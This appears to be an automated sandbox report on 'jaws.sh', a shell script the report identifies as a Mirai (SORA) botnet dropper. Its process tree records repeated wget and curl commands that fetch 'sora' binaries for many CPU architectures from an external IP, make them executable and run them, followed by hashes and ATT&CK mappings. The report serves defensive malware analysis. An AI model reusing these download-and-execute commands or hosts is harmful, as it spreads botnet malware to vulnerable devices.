Analysis
-
max time kernel
14s -
max time network
15s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-11-2024 14:37
Static task
static1
Behavioral task
behavioral1
Sample
jaws.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
jaws.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
jaws.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
jaws.sh
-
Size
2KB
-
MD5
a39430f0a72b7ca78b308b49dc968338
-
SHA1
dcc3efe2e6da2394ac5ef5d8a85207978cd3a554
-
SHA256
2d2b2aac5221caf1d6da72b569fa3ad2b4ecd5c2fd7784e64140261b5f921348
-
SHA512
4a20cc0c43770a295ecf2ecd28fa36d3c72eb2f55628c17d0f628c71e12add877621ea25a5724206848a00320bab4fe010ab60c157bd14b184e5b9ee839d147b
Malware Config
Extracted
mirai
SORA
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 819 chmod 832 chmod 690 chmod 748 chmod 764 chmod 807 chmod 678 chmod 826 chmod 696 chmod 705 chmod 780 chmod 718 chmod 733 chmod 775 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 680 robben /tmp/robben 691 robben /tmp/robben 697 robben /tmp/robben 707 robben /tmp/robben 720 robben /tmp/robben 734 robben /tmp/robben 749 robben /tmp/robben 765 robben /tmp/robben 776 robben /tmp/robben 781 robben /tmp/robben 808 robben /tmp/robben 821 robben /tmp/robben 827 robben /tmp/robben 833 robben -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-7.dat upx -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe robben File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 689 cat 682 wget 687 curl -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.ppc440fp curl File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/robben jaws.sh File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.i686 curl
Processes
-
/tmp/jaws.sh/tmp/jaws.sh1⤵
- Writes file to tmp directory
PID:652 -
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x862⤵
- Writes file to tmp directory
PID:654
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/catcat sora.x862⤵PID:677
-
-
/bin/chmodchmod +x jaws.sh robben sora.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:680
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:682
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:687
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:689
-
-
/bin/chmodchmod +x jaws.sh robben sora.mips sora.x86 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:691
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:693
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:694
-
-
/bin/catcat sora.x86_642⤵PID:695
-
-
/bin/chmodchmod +x jaws.sh robben sora.mips sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:697
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i4682⤵PID:699
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:700
-
-
/bin/catcat sora.i4682⤵PID:703
-
-
/bin/chmodchmod +x jaws.sh robben sora.i468 sora.mips sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:707
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.i6862⤵
- Writes file to tmp directory
PID:708
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:712
-
-
/bin/catcat sora.i6862⤵PID:717
-
-
/bin/chmodchmod +x jaws.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:718
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:720
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:722
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/catcat sora.mpsl2⤵PID:731
-
-
/bin/chmodchmod +x jaws.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:734
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm42⤵PID:737
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/catcat sora.arm42⤵PID:746
-
-
/bin/chmodchmod +x jaws.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:749
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm52⤵
- Writes file to tmp directory
PID:750
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/catcat sora.arm52⤵PID:762
-
-
/bin/chmodchmod +x jaws.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:765
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm62⤵
- Writes file to tmp directory
PID:767
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/catcat sora.arm62⤵PID:774
-
-
/bin/chmodchmod +x jaws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
- Reads runtime system information
PID:776
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.arm72⤵
- Writes file to tmp directory
PID:777
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/catcat sora.arm72⤵PID:779
-
-
/bin/chmodchmod +x jaws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
- Reads runtime system information
PID:781
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:782
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/catcat sora.ppc2⤵PID:806
-
-
/bin/chmodchmod +x jaws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:808
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.ppc440fp2⤵PID:811
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.ppc440fp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/catcat sora.ppc440fp2⤵PID:818
-
-
/bin/chmodchmod +x jaws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:821
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:822
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/catcat sora.m68k2⤵PID:825
-
-
/bin/chmodchmod +x jaws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:827
-
-
/usr/bin/wgetwget http://93.123.85.190/bins/sora.sh42⤵
- Writes file to tmp directory
PID:829
-
-
/usr/bin/curlcurl -O http://93.123.85.190/bins/sora.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/catcat sora.sh42⤵PID:831
-
-
/bin/chmodchmod +x jaws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh4 sora.x86 sora.x86_64 systemd-private-5630960eeaf04fc59206c5cedded8476-systemd-timedated.service-qjKNX02⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:833
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5fa5457b7546c1b7060c30bde3f8649ca
SHA17c75f6463c36eaebc4719f47d8047e5195a85057
SHA256d3f2f30efffec0f49e28199c60b2819a3e831ae0ba920abd2c5ece5e4bfb3adf
SHA512f012d61a479015af70447b1c3bd2a48c2977691f9a180f4f5c3340b034c65d69782299cb8459e92e3a18dcadfa3078c8b1c613593170f9fa95dd53ba36050c21
-
Filesize
28KB
MD5ec332610b0ca5b634c097ed14f42eedc
SHA1abcbd111601f4165c400e9db36fbf20339e37170
SHA2562bfdc588e26d5f6ac54ca3330ced3ab2bfc9bafb98cdd91fd017180dd5848b3a
SHA512f41f54e2aca4a5dfa3d7bcbad45963aa943fa3b6536c34f7c92c7c79894f1009ef5ab13cfed39b74ffc614791b77497689bcbe71edfefecb20497d873c92d1b0
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5d356657b6ea7a715b60217a914eb6ca8
SHA1b276b1a91895c3025e9f9d64227205dac79c8ef6
SHA256b0758e5e7fde30404ec43dd5fba21253735464062e8a10f0876193d18194fe22
SHA5123b0ab5d1282c9d2ea18ed0fc78aeabafde6c16fa094d53d39a67d3316482da0cffa444dd5dc14aeefb547ce2f789480caa5bb514cb4a26787c7441ba8862e262
-
Filesize
64KB
MD5fb3d051f41bd7347aeff64980f2d100b
SHA15261ff91b8d99d6b8f5f647e33aad29b90cee973
SHA25619f4b46d738fa23ff571db081cea0bf34509b9799de2116853e77691faaebec1
SHA51282dd9805571030fc4a56a8d5838f5ee3fe1b162f059c905a48f37abcc4dc58442e1e909ab4a2352d690af8ac306eafe4d89cb87f37baec8a8136d48e884be4dd
-
Filesize
27KB
MD500eff503439515d9b12b9c068367cb80
SHA182d68f2b1ffca8558458c1b858599542a67d8bbf
SHA2562962b987b00b166299f9a73f7ccb8dc02b4208266465b41f6b1c9c28277d7276
SHA5123800bc5a8f3983fc50813c49c906203af6528ff3eb97b4818a8632085562c25eab1c691edb5dcdc96c8d2c3f25784a41897ec8a52c042d391899a310224d50f5